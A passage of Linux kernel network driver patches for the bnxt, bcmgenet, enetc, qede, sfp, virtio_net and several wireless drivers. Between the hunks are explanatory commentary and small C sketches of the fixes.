+@@ -4787,6 +4790,9 @@ int bnxt_hwrm_func_drv_rgtr(struct bnxt *bp, unsigned long *bmap, int bmap_size,
+ 		if (event_id == ASYNC_EVENT_CMPL_EVENT_ID_ERROR_RECOVERY &&
+ 		    !(bp->fw_cap & BNXT_FW_CAP_ERROR_RECOVERY))
+ 			continue;
++		if (event_id == ASYNC_EVENT_CMPL_EVENT_ID_PHC_UPDATE &&
++		    !bp->ptp_cfg)
++			continue;
+ 		__set_bit(bnxt_async_events_arr[i], async_events_bmap);
+ 	}
+ 	if (bmap && bmap_size) {
+@@ -8808,6 +8814,9 @@ static int bnxt_init_chip(struct bnxt *bp, bool irq_re_init)
+ 		goto err_out;
+ 	}
+ 
++	if (BNXT_VF(bp))
++		bnxt_hwrm_func_qcfg(bp);
++
+ 	rc = bnxt_setup_vnic(bp, 0);
+ 	if (rc)
+ 		goto err_out;
+@@ -11573,6 +11582,7 @@ static void bnxt_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ static void bnxt_fw_health_check(struct bnxt *bp)
+ {
+ 	struct bnxt_fw_health *fw_health = bp->fw_health;
++	struct pci_dev *pdev = bp->pdev;
+ 	u32 val;
+ 
+ 	if (!fw_health->enabled || test_bit(BNXT_STATE_IN_FW_RESET, &bp->state))
+@@ -11586,7 +11596,7 @@ static void bnxt_fw_health_check(struct bnxt *bp)
+ 	}
+ 
+ 	val = bnxt_fw_health_readl(bp, BNXT_FW_HEARTBEAT_REG);
+-	if (val == fw_health->last_fw_heartbeat) {
++	if (val == fw_health->last_fw_heartbeat && pci_device_is_present(pdev)) {
+ 		fw_health->arrests++;
+ 		goto fw_reset;
+ 	}
+@@ -11594,7 +11604,7 @@ static void bnxt_fw_health_check(struct bnxt *bp)
+ 	fw_health->last_fw_heartbeat = val;
+ 
+ 	val = bnxt_fw_health_readl(bp, BNXT_FW_RESET_CNT_REG);
+-	if (val != fw_health->last_fw_reset_cnt) {
++	if (val != fw_health->last_fw_reset_cnt && pci_device_is_present(pdev)) {
+ 		fw_health->discoveries++;
+ 		goto fw_reset;
+ 	}
+@@ -12998,26 +13008,37 @@ static void bnxt_cfg_ntp_filters(struct bnxt *bp)
+ 
+ #endif /* CONFIG_RFS_ACCEL */
+ 
+-static int bnxt_udp_tunnel_sync(struct net_device *netdev, unsigned int table)
++static int bnxt_udp_tunnel_set_port(struct net_device *netdev, unsigned int table,
++				    unsigned int entry, struct udp_tunnel_info *ti)
+ {
+ 	struct bnxt *bp = netdev_priv(netdev);
+-	struct udp_tunnel_info ti;
+ 	unsigned int cmd;
+ 
+-	udp_tunnel_nic_get_port(netdev, table, 0, &ti);
+-	if (ti.type == UDP_TUNNEL_TYPE_VXLAN)
++	if (ti->type == UDP_TUNNEL_TYPE_VXLAN)
+ 		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_VXLAN;
+ 	else
+ 		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_GENEVE;
+ 
+-	if (ti.port)
+-		return bnxt_hwrm_tunnel_dst_port_alloc(bp, ti.port, cmd);
++	return bnxt_hwrm_tunnel_dst_port_alloc(bp, ti->port, cmd);
++}
++
++static int bnxt_udp_tunnel_unset_port(struct net_device *netdev, unsigned int table,
++				      unsigned int entry, struct udp_tunnel_info *ti)
++{
++	struct bnxt *bp = netdev_priv(netdev);
++	unsigned int cmd;
++
++	if (ti->type == UDP_TUNNEL_TYPE_VXLAN)
++		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_VXLAN;
++	else
++		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_GENEVE;
+ 
+ 	return bnxt_hwrm_tunnel_dst_port_free(bp, cmd);
+ }
+ 
+ static const struct udp_tunnel_nic_info bnxt_udp_tunnels = {
+-	.sync_table	= bnxt_udp_tunnel_sync,
++	.set_port	= bnxt_udp_tunnel_set_port,
++	.unset_port	= bnxt_udp_tunnel_unset_port,
+ 	.flags		= UDP_TUNNEL_NIC_INFO_MAY_SLEEP |
+ 			  UDP_TUNNEL_NIC_INFO_OPEN_ONLY,
+ 	.tables		= {
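
The conversion from .sync_table to paired .set_port/.unset_port callbacks lets the UDP tunnel core tell the driver exactly which entry changed and in which direction, instead of the driver re-reading the table and inferring intent from ti.port being zero (the old code could only free in that case). A skeleton of the callback pair for a hypothetical driver, using the same signatures as above:

#include <linux/netdevice.h>
#include <net/udp_tunnel.h>

static int foo_udp_tunnel_set_port(struct net_device *dev, unsigned int table,
				   unsigned int entry, struct udp_tunnel_info *ti)
{
	/* program ti->port for ti->type into HW slot (table, entry) */
	return 0;
}

static int foo_udp_tunnel_unset_port(struct net_device *dev, unsigned int table,
				     unsigned int entry, struct udp_tunnel_info *ti)
{
	/* release HW slot (table, entry) */
	return 0;
}

static const struct udp_tunnel_nic_info foo_udp_tunnels = {
	.set_port	= foo_udp_tunnel_set_port,
	.unset_port	= foo_udp_tunnel_unset_port,
	.tables		= {
		{ .n_entries = 4, .tunnel_types = UDP_TUNNEL_TYPE_VXLAN },
	},
};
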
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index b2d531e014c57..89f046ce1373c 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -3727,7 +3727,7 @@ static int bnxt_reset(struct net_device *dev, u32 *flags)
+ 		}
+ 	}
+ 
+-	if (req & BNXT_FW_RESET_AP) {
++	if (!BNXT_CHIP_P4_PLUS(bp) && (req & BNXT_FW_RESET_AP)) {
+ 		/* This feature is not supported in older firmware versions */
+ 		if (bp->hwrm_spec_code >= 0x10803) {
+ 			if (!bnxt_firmware_reset_ap(dev)) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+index 2132ce63193ce..4faaa9a50f4bc 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ptp.c
+@@ -929,6 +929,7 @@ int bnxt_ptp_init(struct bnxt *bp, bool phc_cfg)
+ 	} else {
+ 		bnxt_ptp_timecounter_init(bp, true);
+ 	}
++	bnxt_hwrm_func_drv_rgtr(bp, NULL, 0, true);
+ 
+ 	ptp->ptp_info = bnxt_ptp_caps;
+ 	if ((bp->fw_cap & BNXT_FW_CAP_PTP_PPS)) {
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 4da2becfa950c..1ae082eb9e905 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -1290,7 +1290,8 @@ static void bcmgenet_get_ethtool_stats(struct net_device *dev,
+ 	}
+ }
+ 
+-static void bcmgenet_eee_enable_set(struct net_device *dev, bool enable)
++void bcmgenet_eee_enable_set(struct net_device *dev, bool enable,
++			     bool tx_lpi_enabled)
+ {
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 	u32 off = priv->hw_params->tbuf_offset + TBUF_ENERGY_CTRL;
+@@ -1310,7 +1311,7 @@ static void bcmgenet_eee_enable_set(struct net_device *dev, bool enable)
+ 
+ 	/* Enable EEE and switch to a 27Mhz clock automatically */
+ 	reg = bcmgenet_readl(priv->base + off);
+-	if (enable)
++	if (tx_lpi_enabled)
+ 		reg |= TBUF_EEE_EN | TBUF_PM_EN;
+ 	else
+ 		reg &= ~(TBUF_EEE_EN | TBUF_PM_EN);
+@@ -1331,6 +1332,7 @@ static void bcmgenet_eee_enable_set(struct net_device *dev, bool enable)
+ 
+ 	priv->eee.eee_enabled = enable;
+ 	priv->eee.eee_active = enable;
++	priv->eee.tx_lpi_enabled = tx_lpi_enabled;
+ }
+ 
+ static int bcmgenet_get_eee(struct net_device *dev, struct ethtool_eee *e)
+@@ -1346,6 +1348,7 @@ static int bcmgenet_get_eee(struct net_device *dev, struct ethtool_eee *e)
+ 
+ 	e->eee_enabled = p->eee_enabled;
+ 	e->eee_active = p->eee_active;
++	e->tx_lpi_enabled = p->tx_lpi_enabled;
+ 	e->tx_lpi_timer = bcmgenet_umac_readl(priv, UMAC_EEE_LPI_TIMER);
+ 
+ 	return phy_ethtool_get_eee(dev->phydev, e);
+@@ -1355,7 +1358,6 @@ static int bcmgenet_set_eee(struct net_device *dev, struct ethtool_eee *e)
+ {
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 	struct ethtool_eee *p = &priv->eee;
+-	int ret = 0;
+ 
+ 	if (GENET_IS_V1(priv))
+ 		return -EOPNOTSUPP;
+@@ -1366,16 +1368,11 @@ static int bcmgenet_set_eee(struct net_device *dev, struct ethtool_eee *e)
+ 	p->eee_enabled = e->eee_enabled;
+ 
+ 	if (!p->eee_enabled) {
+-		bcmgenet_eee_enable_set(dev, false);
++		bcmgenet_eee_enable_set(dev, false, false);
+ 	} else {
+-		ret = phy_init_eee(dev->phydev, false);
+-		if (ret) {
+-			netif_err(priv, hw, dev, "EEE initialization failed\n");
+-			return ret;
+-		}
+-
++		p->eee_active = phy_init_eee(dev->phydev, false) >= 0;
+ 		bcmgenet_umac_writel(priv, e->tx_lpi_timer, UMAC_EEE_LPI_TIMER);
+-		bcmgenet_eee_enable_set(dev, true);
++		bcmgenet_eee_enable_set(dev, p->eee_active, e->tx_lpi_enabled);
+ 	}
+ 
+ 	return phy_ethtool_set_eee(dev->phydev, e);
+@@ -4274,9 +4271,6 @@ static int bcmgenet_resume(struct device *d)
+ 	if (!device_may_wakeup(d))
+ 		phy_resume(dev->phydev);
+ 
+-	if (priv->eee.eee_enabled)
+-		bcmgenet_eee_enable_set(dev, true);
+-
+ 	bcmgenet_netif_start(dev);
+ 
+ 	netif_device_attach(dev);
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.h b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+index 946f6e283c4e6..1985c0ec4da2a 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.h
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.h
+@@ -703,4 +703,7 @@ int bcmgenet_wol_power_down_cfg(struct bcmgenet_priv *priv,
+ void bcmgenet_wol_power_up_cfg(struct bcmgenet_priv *priv,
+ 			       enum bcmgenet_power_mode mode);
+ 
++void bcmgenet_eee_enable_set(struct net_device *dev, bool enable,
++			     bool tx_lpi_enabled);
++
+ #endif /* __BCMGENET_H__ */
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index ded0e64a9f6a1..bf9e246784b6e 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -88,6 +88,11 @@ static void bcmgenet_mac_config(struct net_device *dev)
+ 		reg |= CMD_TX_EN | CMD_RX_EN;
+ 	}
+ 	bcmgenet_umac_writel(priv, reg, UMAC_CMD);
++
++	priv->eee.eee_active = phy_init_eee(phydev, 0) >= 0;
++	bcmgenet_eee_enable_set(dev,
++				priv->eee.eee_enabled && priv->eee.eee_active,
++				priv->eee.tx_lpi_enabled);
+ }
+ 
+ /* setup netdev link state when PHY link status change and
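
Across the three bcmgenet files, the EEE state is split into its proper parts: eee_enabled stays the user's administrative setting, eee_active now reflects what the PHY actually negotiated (phy_init_eee() >= 0) and is re-evaluated on every MAC config instead of once at ethtool time, and tx_lpi_enabled separately gates whether the MAC may enter TX LPI. The decision logic, restated from the hunks above:

priv->eee.eee_active = phy_init_eee(phydev, 0) >= 0; /* negotiated? */
bcmgenet_eee_enable_set(dev,
			priv->eee.eee_enabled && priv->eee.eee_active,
			priv->eee.tx_lpi_enabled);
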
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc.c b/drivers/net/ethernet/freescale/enetc/enetc.c
+index e96449eedfb54..25c303406e6b4 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc.c
+@@ -1209,7 +1209,13 @@ static int enetc_clean_rx_ring(struct enetc_bdr *rx_ring,
+ 		if (!skb)
+ 			break;
+ 
+-		rx_byte_cnt += skb->len;
++		/* When set, the outer VLAN header is extracted and reported
++		 * in the receive buffer descriptor, so rx_byte_cnt must
++		 * include the length of the extracted VLAN header.
++		 */
++		if (bd_status & ENETC_RXBD_FLAG_VLAN)
++			rx_byte_cnt += VLAN_HLEN;
++		rx_byte_cnt += skb->len + ETH_HLEN;
+ 		rx_frm_cnt++;
+ 
+ 		napi_gro_receive(napi, skb);
+@@ -1532,6 +1538,14 @@ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 		enetc_build_xdp_buff(rx_ring, bd_status, &rxbd, &i,
+ 				     &cleaned_cnt, &xdp_buff);
+ 
++		/* When set, the outer VLAN header is extracted and reported
++		 * in the receive buffer descriptor, so rx_byte_cnt must
++		 * include the length of the extracted VLAN header.
++		 */
++		if (bd_status & ENETC_RXBD_FLAG_VLAN)
++			rx_byte_cnt += VLAN_HLEN;
++		rx_byte_cnt += xdp_get_buff_len(&xdp_buff);
++
+ 		xdp_act = bpf_prog_run_xdp(prog, &xdp_buff);
+ 
+ 		switch (xdp_act) {
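
The enetc counter fix reconstructs wire bytes from a post-eth_type_trans() skb: skb->len no longer covers the 14-byte Ethernet header once it has been pulled, and with hardware VLAN extraction the 4-byte tag never reaches the skb at all. Per frame, on the non-XDP path:

/* wire length = payload seen by the stack + pulled/stripped headers */
u32 wire_len = skb->len + ETH_HLEN;		/* ETH_HLEN == 14 */
if (bd_status & ENETC_RXBD_FLAG_VLAN)		/* HW stripped the tag */
	wire_len += VLAN_HLEN;			/* VLAN_HLEN == 4 */
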
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_l2.c b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+index 2edd6bf64a3cc..7776d3bdd459a 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_l2.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+@@ -1903,7 +1903,7 @@ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats)
+ {
+ 	u32 i;
+ 
+-	if (!cdev) {
++	if (!cdev || cdev->recov_in_prog) {
+ 		memset(stats, 0, sizeof(*stats));
+ 		return;
+ 	}
+diff --git a/drivers/net/ethernet/qlogic/qede/qede.h b/drivers/net/ethernet/qlogic/qede/qede.h
+index f90dcfe9ee688..8a63f99d499c4 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede.h
++++ b/drivers/net/ethernet/qlogic/qede/qede.h
+@@ -271,6 +271,10 @@ struct qede_dev {
+ #define QEDE_ERR_WARN			3
+ 
+ 	struct qede_dump_info		dump_info;
++	struct delayed_work		periodic_task;
++	unsigned long			stats_coal_ticks;
++	u32				stats_coal_usecs;
++	spinlock_t			stats_lock; /* lock for vport stats access */
+ };
+ 
+ enum QEDE_STATE {
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_ethtool.c b/drivers/net/ethernet/qlogic/qede/qede_ethtool.c
+index 8034d812d5a00..d0a3395b2bc1f 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_ethtool.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_ethtool.c
+@@ -430,6 +430,8 @@ static void qede_get_ethtool_stats(struct net_device *dev,
+ 		}
+ 	}
+ 
++	spin_lock(&edev->stats_lock);
++
+ 	for (i = 0; i < QEDE_NUM_STATS; i++) {
+ 		if (qede_is_irrelevant_stat(edev, i))
+ 			continue;
+@@ -439,6 +441,8 @@ static void qede_get_ethtool_stats(struct net_device *dev,
+ 		buf++;
+ 	}
+ 
++	spin_unlock(&edev->stats_lock);
++
+ 	__qede_unlock(edev);
+ }
+ 
+@@ -830,6 +834,7 @@ out:
+ 
+ 	coal->rx_coalesce_usecs = rx_coal;
+ 	coal->tx_coalesce_usecs = tx_coal;
++	coal->stats_block_coalesce_usecs = edev->stats_coal_usecs;
+ 
+ 	return rc;
+ }
+@@ -843,6 +848,19 @@ int qede_set_coalesce(struct net_device *dev, struct ethtool_coalesce *coal,
+ 	int i, rc = 0;
+ 	u16 rxc, txc;
+ 
++	if (edev->stats_coal_usecs != coal->stats_block_coalesce_usecs) {
++		edev->stats_coal_usecs = coal->stats_block_coalesce_usecs;
++		if (edev->stats_coal_usecs) {
++			edev->stats_coal_ticks = usecs_to_jiffies(edev->stats_coal_usecs);
++			schedule_delayed_work(&edev->periodic_task, 0);
++
++			DP_INFO(edev, "Configured stats coal ticks=%lu jiffies\n",
++				edev->stats_coal_ticks);
++		} else {
++			cancel_delayed_work_sync(&edev->periodic_task);
++		}
++	}
++
+ 	if (!netif_running(dev)) {
+ 		DP_INFO(edev, "Interface is down\n");
+ 		return -EINVAL;
+@@ -2253,7 +2271,8 @@ out:
+ }
+ 
+ static const struct ethtool_ops qede_ethtool_ops = {
+-	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS,
++	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS |
++					  ETHTOOL_COALESCE_STATS_BLOCK_USECS,
+ 	.get_link_ksettings		= qede_get_link_ksettings,
+ 	.set_link_ksettings		= qede_set_link_ksettings,
+ 	.get_drvinfo			= qede_get_drvinfo,
+@@ -2304,7 +2323,8 @@ static const struct ethtool_ops qede_ethtool_ops = {
+ };
+ 
+ static const struct ethtool_ops qede_vf_ethtool_ops = {
+-	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS,
++	.supported_coalesce_params	= ETHTOOL_COALESCE_USECS |
++					  ETHTOOL_COALESCE_STATS_BLOCK_USECS,
+ 	.get_link_ksettings		= qede_get_link_ksettings,
+ 	.get_drvinfo			= qede_get_drvinfo,
+ 	.get_msglevel			= qede_get_msglevel,
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index 89d64a5a4951a..e8d427c7d1cff 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -308,6 +308,8 @@ void qede_fill_by_demand_stats(struct qede_dev *edev)
+ 
+ 	edev->ops->get_vport_stats(edev->cdev, &stats);
+ 
++	spin_lock(&edev->stats_lock);
++
+ 	p_common->no_buff_discards = stats.common.no_buff_discards;
+ 	p_common->packet_too_big_discard = stats.common.packet_too_big_discard;
+ 	p_common->ttl0_discard = stats.common.ttl0_discard;
+@@ -405,6 +407,8 @@ void qede_fill_by_demand_stats(struct qede_dev *edev)
+ 		p_ah->tx_1519_to_max_byte_packets =
+ 		    stats.ah.tx_1519_to_max_byte_packets;
+ 	}
++
++	spin_unlock(&edev->stats_lock);
+ }
+ 
+ static void qede_get_stats64(struct net_device *dev,
+@@ -413,9 +417,10 @@ static void qede_get_stats64(struct net_device *dev,
+ 	struct qede_dev *edev = netdev_priv(dev);
+ 	struct qede_stats_common *p_common;
+ 
+-	qede_fill_by_demand_stats(edev);
+ 	p_common = &edev->stats.common;
+ 
++	spin_lock(&edev->stats_lock);
++
+ 	stats->rx_packets = p_common->rx_ucast_pkts + p_common->rx_mcast_pkts +
+ 			    p_common->rx_bcast_pkts;
+ 	stats->tx_packets = p_common->tx_ucast_pkts + p_common->tx_mcast_pkts +
+@@ -435,6 +440,8 @@ static void qede_get_stats64(struct net_device *dev,
+ 		stats->collisions = edev->stats.bb.tx_total_collisions;
+ 	stats->rx_crc_errors = p_common->rx_crc_errors;
+ 	stats->rx_frame_errors = p_common->rx_align_errors;
++
++	spin_unlock(&edev->stats_lock);
+ }
+ 
+ #ifdef CONFIG_QED_SRIOV
+@@ -1061,6 +1068,23 @@ static void qede_unlock(struct qede_dev *edev)
+ 	rtnl_unlock();
+ }
+ 
++static void qede_periodic_task(struct work_struct *work)
++{
++	struct qede_dev *edev = container_of(work, struct qede_dev,
++					     periodic_task.work);
++
++	qede_fill_by_demand_stats(edev);
++	schedule_delayed_work(&edev->periodic_task, edev->stats_coal_ticks);
++}
++
++static void qede_init_periodic_task(struct qede_dev *edev)
++{
++	INIT_DELAYED_WORK(&edev->periodic_task, qede_periodic_task);
++	spin_lock_init(&edev->stats_lock);
++	edev->stats_coal_usecs = USEC_PER_SEC;
++	edev->stats_coal_ticks = usecs_to_jiffies(USEC_PER_SEC);
++}
++
+ static void qede_sp_task(struct work_struct *work)
+ {
+ 	struct qede_dev *edev = container_of(work, struct qede_dev,
+@@ -1080,6 +1104,7 @@ static void qede_sp_task(struct work_struct *work)
+ 	 */
+ 
+ 	if (test_and_clear_bit(QEDE_SP_RECOVERY, &edev->sp_flags)) {
++		cancel_delayed_work_sync(&edev->periodic_task);
+ #ifdef CONFIG_QED_SRIOV
+ 		/* SRIOV must be disabled outside the lock to avoid a deadlock.
+ 		 * The recovery of the active VFs is currently not supported.
+@@ -1270,6 +1295,7 @@ static int __qede_probe(struct pci_dev *pdev, u32 dp_module, u8 dp_level,
+ 		 */
+ 		INIT_DELAYED_WORK(&edev->sp_task, qede_sp_task);
+ 		mutex_init(&edev->qede_lock);
++		qede_init_periodic_task(edev);
+ 
+ 		rc = register_netdev(edev->ndev);
+ 		if (rc) {
+@@ -1294,6 +1320,11 @@ static int __qede_probe(struct pci_dev *pdev, u32 dp_module, u8 dp_level,
+ 	edev->rx_copybreak = QEDE_RX_HDR_SIZE;
+ 
+ 	qede_log_probe(edev);
++
++	/* retain user config (for example - after recovery) */
++	if (edev->stats_coal_usecs)
++		schedule_delayed_work(&edev->periodic_task, 0);
++
+ 	return 0;
+ 
+ err4:
+@@ -1362,6 +1393,7 @@ static void __qede_remove(struct pci_dev *pdev, enum qede_remove_mode mode)
+ 		unregister_netdev(ndev);
+ 
+ 		cancel_delayed_work_sync(&edev->sp_task);
++		cancel_delayed_work_sync(&edev->periodic_task);
+ 
+ 		edev->ops->common->set_power_state(cdev, PCI_D0);
+ 
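The qede hunks above hinge on a self-rearming delayed work item that periodically refreshes the cached vport statistics under the new stats_lock. A minimal sketch of that pattern, assuming a hypothetical struct my_dev rather than the real qede structures:

    #include <linux/workqueue.h>
    #include <linux/spinlock.h>

    struct my_dev {
        struct delayed_work periodic_task;
        unsigned long stats_coal_ticks;    /* interval, in jiffies */
        spinlock_t stats_lock;
    };

    static void my_periodic_task(struct work_struct *work)
    {
        struct my_dev *mdev = container_of(work, struct my_dev,
                                           periodic_task.work);

        spin_lock(&mdev->stats_lock);
        /* refresh the cached stats from hardware here */
        spin_unlock(&mdev->stats_lock);

        /* re-arm: the work item reschedules itself */
        schedule_delayed_work(&mdev->periodic_task, mdev->stats_coal_ticks);
    }

Because the work re-arms itself, every teardown path needs a matching cancel_delayed_work_sync(), which is exactly what the patch adds in __qede_remove() and in the QEDE_SP_RECOVERY branch of qede_sp_task().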
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index 766f86bdc4a09..9b1403291d921 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -2199,6 +2199,11 @@ static void sfp_sm_module(struct sfp *sfp, unsigned int event)
+ 			break;
+ 		}
+ 
++		/* Force a poll to re-read the hardware signal state after
++		 * sfp_sm_mod_probe() changed state_hw_mask.
++		 */
++		mod_delayed_work(system_wq, &sfp->poll, 1);
++
+ 		err = sfp_hwmon_insert(sfp);
+ 		if (err)
+ 			dev_warn(sfp->dev, "hwmon probe failed: %pe\n",
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 47788f0935514..fae302c5b0a91 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -200,6 +200,8 @@ struct control_buf {
+ 	__virtio16 vid;
+ 	__virtio64 offloads;
+ 	struct virtio_net_ctrl_rss rss;
++	struct virtio_net_ctrl_coal_tx coal_tx;
++	struct virtio_net_ctrl_coal_rx coal_rx;
+ };
+ 
+ struct virtnet_info {
+@@ -2786,12 +2788,10 @@ static int virtnet_send_notf_coal_cmds(struct virtnet_info *vi,
+ 				       struct ethtool_coalesce *ec)
+ {
+ 	struct scatterlist sgs_tx, sgs_rx;
+-	struct virtio_net_ctrl_coal_tx coal_tx;
+-	struct virtio_net_ctrl_coal_rx coal_rx;
+ 
+-	coal_tx.tx_usecs = cpu_to_le32(ec->tx_coalesce_usecs);
+-	coal_tx.tx_max_packets = cpu_to_le32(ec->tx_max_coalesced_frames);
+-	sg_init_one(&sgs_tx, &coal_tx, sizeof(coal_tx));
++	vi->ctrl->coal_tx.tx_usecs = cpu_to_le32(ec->tx_coalesce_usecs);
++	vi->ctrl->coal_tx.tx_max_packets = cpu_to_le32(ec->tx_max_coalesced_frames);
++	sg_init_one(&sgs_tx, &vi->ctrl->coal_tx, sizeof(vi->ctrl->coal_tx));
+ 
+ 	if (!virtnet_send_command(vi, VIRTIO_NET_CTRL_NOTF_COAL,
+ 				  VIRTIO_NET_CTRL_NOTF_COAL_TX_SET,
+@@ -2802,9 +2802,9 @@ static int virtnet_send_notf_coal_cmds(struct virtnet_info *vi,
+ 	vi->tx_usecs = ec->tx_coalesce_usecs;
+ 	vi->tx_max_packets = ec->tx_max_coalesced_frames;
+ 
+-	coal_rx.rx_usecs = cpu_to_le32(ec->rx_coalesce_usecs);
+-	coal_rx.rx_max_packets = cpu_to_le32(ec->rx_max_coalesced_frames);
+-	sg_init_one(&sgs_rx, &coal_rx, sizeof(coal_rx));
++	vi->ctrl->coal_rx.rx_usecs = cpu_to_le32(ec->rx_coalesce_usecs);
++	vi->ctrl->coal_rx.rx_max_packets = cpu_to_le32(ec->rx_max_coalesced_frames);
++	sg_init_one(&sgs_rx, &vi->ctrl->coal_rx, sizeof(vi->ctrl->coal_rx));
+ 
+ 	if (!virtnet_send_command(vi, VIRTIO_NET_CTRL_NOTF_COAL,
+ 				  VIRTIO_NET_CTRL_NOTF_COAL_RX_SET,
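The reason coal_tx/coal_rx move from the stack into the kmalloc'ed struct control_buf: buffers passed to sg_init_one() must be lowmem addresses the virtqueue can describe, and with CONFIG_VMAP_STACK an on-stack object may live in vmalloc space. A before/after sketch, with the surrounding code elided:

    /* before: on-stack object, possibly vmalloc'ed stack memory */
    struct virtio_net_ctrl_coal_tx coal_tx;
    sg_init_one(&sgs_tx, &coal_tx, sizeof(coal_tx));

    /* after: field of the long-lived, kmalloc'ed vi->ctrl */
    sg_init_one(&sgs_tx, &vi->ctrl->coal_tx, sizeof(vi->ctrl->coal_tx));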
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index c876e81437fee..2748459d12279 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -2724,17 +2724,13 @@ static bool iwl_mvm_wait_d3_notif(struct iwl_notif_wait_data *notif_wait,
+ 		if (wowlan_info_ver < 2) {
+ 			struct iwl_wowlan_info_notif_v1 *notif_v1 = (void *)pkt->data;
+ 
+-			notif = kmemdup(notif_v1,
+-					offsetofend(struct iwl_wowlan_info_notif,
+-						    received_beacons),
+-					GFP_ATOMIC);
+-
++			notif = kmemdup(notif_v1, sizeof(*notif), GFP_ATOMIC);
+ 			if (!notif)
+ 				return false;
+ 
+ 			notif->tid_tear_down = notif_v1->tid_tear_down;
+ 			notif->station_id = notif_v1->station_id;
+-
++			memset_after(notif, 0, station_id);
+ 		} else {
+ 			notif = (void *)pkt->data;
+ 		}
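Since the kmemdup() now copies sizeof(*notif) bytes out of the smaller v1 notification, the tail of the new buffer initially holds unrelated packet bytes; memset_after() from <linux/string.h> zeroes every member after a named field. A minimal sketch with a hypothetical layout:

    #include <linux/string.h>
    #include <linux/types.h>

    struct notif {
        u8  tid_tear_down;
        u8  station_id;
        u32 later_fields[4];    /* data a v1 sender never supplied */
    };

    static void sanitize(struct notif *n)
    {
        /* zero every byte of *n that follows station_id, so stale
         * bytes from the oversized kmemdup() cannot leak through */
        memset_after(n, 0, station_id);
    }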
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index faed43b11ec93..40c80d09d108a 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -921,7 +921,10 @@ void mt7615_mac_sta_poll(struct mt7615_dev *dev)
+ 
+ 		msta = list_first_entry(&sta_poll_list, struct mt7615_sta,
+ 					poll_list);
++
++		spin_lock_bh(&dev->sta_poll_lock);
+ 		list_del_init(&msta->poll_list);
++		spin_unlock_bh(&dev->sta_poll_lock);
+ 
+ 		addr = mt7615_mac_wtbl_addr(dev, msta->wcid.idx) + 19 * 4;
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index 62fb28f14c94d..fabca307867a0 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -88,15 +88,6 @@ static int rtw_ops_config(struct ieee80211_hw *hw, u32 changed)
+ 		}
+ 	}
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_PS) {
+-		if (hw->conf.flags & IEEE80211_CONF_PS) {
+-			rtwdev->ps_enabled = true;
+-		} else {
+-			rtwdev->ps_enabled = false;
+-			rtw_leave_lps(rtwdev);
+-		}
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL)
